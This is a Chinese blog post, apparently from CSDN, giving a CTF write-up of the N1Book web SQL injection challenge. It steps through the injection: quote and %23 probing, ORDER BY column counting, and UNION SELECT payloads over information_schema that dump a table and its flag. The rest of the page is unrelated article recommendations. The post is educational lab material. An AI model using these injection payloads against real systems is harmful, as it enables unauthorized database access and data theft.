N1Book [第一章 web入门]-sql注入

最新推荐文章于 2024-05-03 13:56:41 发布
最新推荐文章于 2024-05-03 13:56:41 发布
阅读量773 收藏 6
点赞数 5
文章标签: sql 数据库
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_61368098/article/details/126444273
版权

[第一章  web入门]-sql注入-WriteUp

目录

寻找注入点

寻找flag

get flag

寻找注入点

题目:

 加URL后面一个单引号,提交发现页面无回显。

 再在单引号后面加%23(%23是经过URL编码后的#号),回车,页面又正常回显。这时可以判断出此处存在字符型sql注入。

 

寻找flag

 首先判断有几个字段和显示位。输入 order by 3,正常回显。

 

 输入 order by 4,页面无回显,证明目标有3个字段。

 现在判断有几个显示位。尝试采用联合查询的方法进行注入,输入 union select 1,2,3,页面回显数字2和3,说明第二位和第三位是显示位。

 在显示位处输入database(),爆出当前使用的数据名称'note'。

下一步是获取当前数据库下的表,输入 union select 1,group_concat('|',table_name),database() from information_schema.tables where table_schema='note',爆出note数据库中存在名为'fl4g'和'notes'的表。我们应该选哪个呢?fl4g和flag相似,更加符合我们想要的信息,而在真实测试中也需要我们判断哪里存放着更为重要的信息。

选择了fl4g这个表,再看看表下的字段 union select 1,group_concat('|',column_name),database() from information_schema.columns where table_schema='note' and table_name='fl4g',只有一个叫'fllllag'的字段。

 

get flag

得到了这些信息足够得到flag。union select 1,2,group_concat('|',fllllag) from fl4g。

get flag success。注意,我这里用连接函数 group_concat指定数据用  |  隔开,所以flag前面的  |  不要加。提交。

 分享完毕

香蕉你个苹果菠萝批
关注
  • 5
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 3
    评论
Python制作的带有酷界面的小游戏
03-12
使用Python的Tkinter库制作的一款带有酷界面的小游戏,由于使用Pyintsall进行打包所以windows defender可能会报病毒,不必担心,尝试通关吧!
大屏数据可视化
02-18
大屏数据可视化案例;大数据可视化案例;
Python吉林长春二手房源爬虫数据可视化分析大屏全屏系统 开题报告
杭州.黄老师
12-02 5452
在国内,随着Python技术的普及和房地产市场的繁荣,越来越多的学者和企业开始关注Python在二手房源数据抓取和分析方面的应用。通过借鉴国外的先进经验和技术成果,结合本地市场特点和需求进行适当的调整和定制,有望推动相关技术的创新和应用,为吉林长春的二手房市场提供更高效、准确的数据支持和决策参考。然而,需要注意的是,国外的研究和实践主要集中在一些发达国家和地区,对于特定地区如吉林长春的二手房市场的关注度相对较低。接下来就设计数据库,开发后台和接口,开发完整的项目后台和前端,完成最终的作品、测试、使用。
干货分享:10个行业可视化大屏模板(附 Python 源码)
Python数据挖掘
11-04 3757
大家好,数据大屏是一种用于展示和分析数据的可视化工具,通常用于监控、分析和报告数据。大屏可以帮助组织更好地理解和管理其数据,支持数据驱动决策,提高业务效率和决策的质量。本文的大屏基于Python开发,它有广泛生态系统和丰富的库使其成为一个强大的工具,用于开发各种类型的数据大屏应用。今天我来分享10个行业可视化大屏的作品分享,希望大家能从作品中寻找到灵感 ,创造更新的可视化大屏应用。
这N张模板,做出了秒杀echarts和python可视化大屏,老板很满意
Leo的博客
08-10 657
昨天可视化大屏模板,看各位的反应都很不错。无论是会代码开发,还是啥技术也不懂的人,都可以使用模板,做出自己、同事、又或者是老板满意的可视化,这让我觉得我也是真的在传授知识。 可视化大屏,这个火热的名词,从技术上来说,它需要经过需求层调研、交互设计、UI设计、前端开发、后台开发、算法等等;有时候就是一句话“我想在什么情况下,看到什么数据”。 如何设计?这是一个让很多人头疼的问题,甚至很多人对概念都不是很理解。 你可以不会复杂的编程代码技术,你也不需要变成excel函数和透视表高手,一个FineRepor
最新Python数据分析 之 制作酷可视化大屏,特简单
2301_82243558的博客
05-03 1295
既然数据已经有了,下面就可以来编写页面了。导入相关的Python库,同样可以通过pip进行安装。设置一些基本的配置参数,如数据库连接、网页样式、Dash实例、图表颜色。
看完这篇文章,我彻底爱上了Python动态图表!
法纳斯特
12-02 968
关于动态条形图,小F以前推荐过「Bar Chart Race」这个库。三行代码就能实现动态条形图的绘制。有些同学在使用的时候,会出现一些错误。一个是加载文件报错,另一个是生成GIF的时候...
python制作20个酷的数据可视化大屏(含源码)
03-30
本资源“python制作20个酷的数据可视化大屏(含源码)”提供了20个不同的数据可视化项目,涵盖了多个领域的应用,包括智慧物流服务中心、大数据分析系统、地方情况分析、大屏数据统计、App接入终端情况分析、医院...
html实现酷星空可视化大屏源码
05-26
html实现酷星空可视化大屏源码,html大屏源码,可视化大屏,星空穿越,酷的界面效果,灵活的模块配置,打造属于自己的酷大屏,F11全屏打开页面,Ctrl+鼠标滚轮,找到最合适的分辨率,展现最好的界面效果。...
html实现酷美观的可视化大屏风格4源码 +大屏系列四
07-25
html实现酷美观的可视化大屏风格4源码,大屏源码,html可视化大屏模板源码,系列大屏风格十种,详见文章讲解,包含各种各样的大屏需求,挑选合适自己的一种风格,详细的讲解,酷的线条,美观的设计,让图文图表...
092 酷大屏数据可视化模板_大屏幕展屏(html源码).rar
04-29
3. 数据可视化库:为了实现酷的图表效果,这个模板可能集成了流行的JavaScript数据可视化库,如D3.js、ECharts、Highcharts或Chart.js等。这些库提供了丰富的图表类型,如柱状图、折线图、饼图、地图等,以及高度...
可视化大屏实例
11-16
可视化大屏完整实例,用echarts 实现图标,效果比较好,
数据可视化大屏Echarts,这里就是你想要的数据可视化大屏
04-29
数据可视化大屏+Echarts+HTML+vscode开发环境,数据可视化大屏Echarts,柱状图、折线图、饼图、中国地图怎么使用。
html实现酷美观的可视化大屏风格5源码 +大屏系列五
最新发布
07-25
html实现酷美观的可视化大屏风格5源码,大屏源码,html可视化大屏模板源码,系列大屏风格十种,详见文章讲解,包含各种各样的大屏需求,挑选合适自己的一种风格,详细的讲解,酷的线条,美观的设计,让图文图表...
html实现酷美观的可视化大屏风格3源码 +大屏系列三
07-23
html实现酷美观的可视化大屏风格3源码,大屏源码,html可视化大屏模板源码,系列大屏风格十种,详见文章讲解,包含各种各样的大屏需求,挑选合适自己的一种风格,详细的讲解,酷的线条,美观的设计,让图文图表...
python爬取招聘网站数据,利用tableau可视化交互大屏,指导你如何学习、找工作!
热门推荐
数据分析与统计学之美
03-17 2万+
本文基于这个问题,针对51job招聘网站,爬取了全国范围内大数据、数据分析、数据挖掘、机器学习、人工智能等相关岗位的招聘信息。分析比较了不同岗位的薪资、学历要求;分析比较了不同区域、行业对相关人才的需求情况;分析比较了不同岗位的知识、技能要求等。
Python制作酷可视化大屏,特简单!
法纳斯特
12-26 5555
大家好,我是小F~在数据时代,我们每个人既是数据的生产者,也是数据的使用者,然而初次获取和存储的原始数据杂乱无章、信息冗余、价值较低。要想数据达到生动有趣、让人一目了然、豁然开朗的效果,就...
整理了20个数据可视化大屏,源码限时领取!
zandaoguang的博客
06-06 3242
文末获取源码最近有不少小伙伴问小编:有没有数据可视化大屏模板,而且要B格很高的。立马安排。给大家整理了一波。下载到本地后,直接运行文件夹中的index.html,即可看到大屏。以下是部分截...
threejs可视化大屏3D
06-10
地图是一种基于Three.js技术的可视化应用,可以将地图数据以3D形式呈现在屏幕上,更加生动形象地展示地理信息。下面是一些实现Three.js可视化大屏3D地图的关键技术: 1. Three.js:这是一款基于JavaScript的WebGL库,可用于创建和显示动态3D图形。使用Three.js可以轻松创建3D场景、渲染器、光源、材质等。 2. 数据处理:地图数据的处理是实现Three.js可视化大屏3D地图的关键。需要对地图数据进行处理,如转换坐标系、数据格式的转换等。 3. 地图样式:地图样式是指地图的外观和布局。可以使用CSS、SVG和Canvas等技术来设计地图样式。 4. 交互功能:交互功能是指用户与地图的交互,如缩放、旋转、拖拽、点击等。可以使用Three.js提供的交互库或自定义交互功能。 5. 性能优化:Three.js可视化大屏3D地图需要处理大量的地图数据和复杂的图形渲染,因此需要进行性能优化,如减少不必要的渲染、使用GPU加速等。 以上是实现Three.js可视化大屏3D地图的关键技术,希望能对你有所帮助。
评论 3
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值